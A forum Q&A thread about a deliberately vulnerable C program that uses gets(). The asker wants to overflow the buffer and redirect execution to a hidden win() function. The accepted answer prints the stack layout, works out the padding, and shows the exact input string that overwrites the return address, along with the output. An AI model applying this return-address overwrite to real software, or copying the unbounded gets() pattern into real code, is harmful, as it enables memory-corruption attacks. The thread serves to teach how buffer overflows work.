# Trying to call a hidden function with a buffer overflow

Tags: c, gdb, stack-overflow, buffer-overflow

So I'm trying to perform a stack-based buffer overflow on this code:

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("well done!");
}

void vulnfunc(){
  char buffer[36];
  gets(buffer);
  printf("Buffer contents are %s\n",buffer);
}

int main(int argc,char**argv){
  vulnfunc();
}
```

So I overwrote the EIP with 44 bytes (the buffer's 36 and an extra 8 bytes). Then I got the address of the function win, changed it from `0x53e58955` into its appropriate like so

```
\x55\x89\xe5\x53
```

When I concatenate the two strings together as input it still doesn't call the `win()` function. I've tried adding `"BBBB"` as padding to fill ebp but no luck there either. If anyone could give some advice I would really appreciate it.

It's running on Ubuntu, x86_64

Comment: Is `0x53e58955` the address of `win()` you read from mapfile?

Comment: @RobertoCaboni I got the address from using the x command. `x win`.

Comment: When I print a string to which I entered those 16 bytes from the console, it outputs `\x55\x89\xe5\x53` exactly what I entered. Not `U..S` (two non-ASCII in the middle).

Comment: Is the purpose of this to show [gets() is risky to use?](https://www.geeksforgeeks.org/gets-is-risky-to-use/)

Comment: @ryyker yes it is.@Weather Vane the reason I did that is because I thought you had to take each byte and put it in reverse fashion if you were to use it as the shellcode?

Comment: @WeatherVane OP is trying to overwrite the return address of the function in the stack with the one of `win()` function.

Comment: @RobertoCaboni I realise that, but the implication is that OP intends to cause a buffer overflow with data entered from the keyboard, and those 16 text bytes do not get converted into a 4-byte address.

Comment: @WeatherVane so is it that I'm writing the new shellcode (in this case the desired return address) wrong?

Comment: I reproduced, in some way, the exploit in Windows. `"well done!"` message printed... and then a crash. Is it enough for you or you are trying to achieve a clean exit?

Comment: @RobertoCaboni no it doesn't matter if it crashed, so long as it outputs

Comment: @WeatherVane If those bytes are written exactly where the return address from `vulnfunc()` to `main()` used to be, they will actually be converted as an address as soon as the first function returns, and this will result to a jump to `win()`. See my answer.

Comment: @RobertoCaboni that is what I meant, and that's all: you have to insert the *actual* characters (your `0§@` and `0`). The escape codes that the compiler interprets are no use entered as a string by the user.

Comment: @WeatherVane oh, sorry. Now I get what you meant.

Answer (score 5, accepted):

I reproduced the *exploit* on Windows. Since the system and the console might be different I'll explain the procedure than the raw code. For this reason it won't be a *copy-and-paste* solution, but a *copy-the-procedure-to-get-a-similar-result* solution.

First of all, I wanted to find out the stack structure. So I executed the following modified `vulnfunc()`:

```
void vulnfunc(){
  char buffer[36];

  printf("win(): 0x%p\n", win);
  printf("vulnfunc(): 0x%p\n", vulnfunc);
  printf("main(): 0x%p\n", main);
  printf("printf(): 0x%p\n", printf);
  
  printf( "0x%08X %08X %08X %08X\n",
          (int) *((int*)&buffer[36]), (int) *((int*)&buffer[40]),
          (int) *((int*)&buffer[44]), (int) *((int*)&buffer[48]));
  printf( "0x%08X %08X %08X %08X\n",
          (int) *((int*)&buffer[52]), (int) *((int*)&buffer[56]),
          (int) *((int*)&buffer[60]), (int) *((int*)&buffer[64]) );
  printf( "0x%08X %08X %08X %08X\n",
          (int) *((int*)&buffer[68]), (int) *((int*)&buffer[72]),
          (int) *((int*)&buffer[76]), (int) *((int*)&buffer[80]) );

  gets(buffer);
}
```

As you can see, I printed the `win()` address together with all the other relevant functions, including `main` and `printf` as well. Then, I printed a relevant portion of the stack (48 bytes) **after** the buffer `array`.

I got the following output:

```
win(): 0x0000000000401530
vulnfunc(): 0x000000000040154B
main(): 0x00000000004016D9
printf(): 0x0000000000402C98
0xFFFFFFFF 00000008 00000000 0062FE20
0x00000000 004016F2 00000000 00000000
0x00000000 00000008 00000000 00000000
```

The addresses of the functions are useful because what I need is a return address within `main()` (address `0x00000000004016D9`). The candidate is of course **`004016F2`**.

So, what I need is to insert enough characters through `gets()` in order to reach the desired address. We need exactly to insert 24 characters, being those **from byte 21 to byte 24** beyond the end of `buffer` array the ones containing the address. The value of the 20 bytes preceeding them are not important, so I insert random ASCII characters.

The result is the expected one:

```
win(): 0x0000000000401530
vulnfunc(): 0x000000000040154B
main(): 0x00000000004016D9
printf(): 0x0000000000402C98
0xFFFFFFFF 00000008 00000000 0062FE20
0x00000000 004016F2 00000000 00000000
0x00000000 00000008 00000000 00000000
123456789012345678901234567890123456AAAABBBBCCCCDDDDEEEE0§@
Buffer contents are 123456789012345678901234567890123456AAAABBBBCCCCDDDDEEEE0@
well done!
<crash>
```

Please note how:

- `"123456789012345678901234567890123456"` are the 36 characters occupying the "legal" area of the array
- `"AAAABBBBCCCCDDDDEEEE"`are 20 "padding" characters, just to reach the desired location of the stack
- the injected address is `0§@` (`0x30`, `0x15` and `0x40`) and the string terminator filled by `gets()` provides the missing `0x00`

As expected the `win()` function is executed; after it a crash occurs because after returning from it the stack didn't contain the correct return address on `main()` (it is corrupted).

On Ubuntu you'll probably have a different stack configuration, but in a very similar way you can discover how to perform the desired exploit.

Comment: Thanks very much for such an extensive answer, but I'm still fairly confused. How did you get it to overflow with only 6 bytes?

Comment: @Fiachoneill In my answer (for lazyness) I overwrote from code the proper address of the stack: 4 bytes to be written 20 bytes beyond the end of the buffer.

Comment: @FiachONeill I have edited my question performing the exploit from `gets()` input like you asked. I'm confident that you'll be able to obtain the same goal on Ubuntu.

Comment: just got it! Thanks!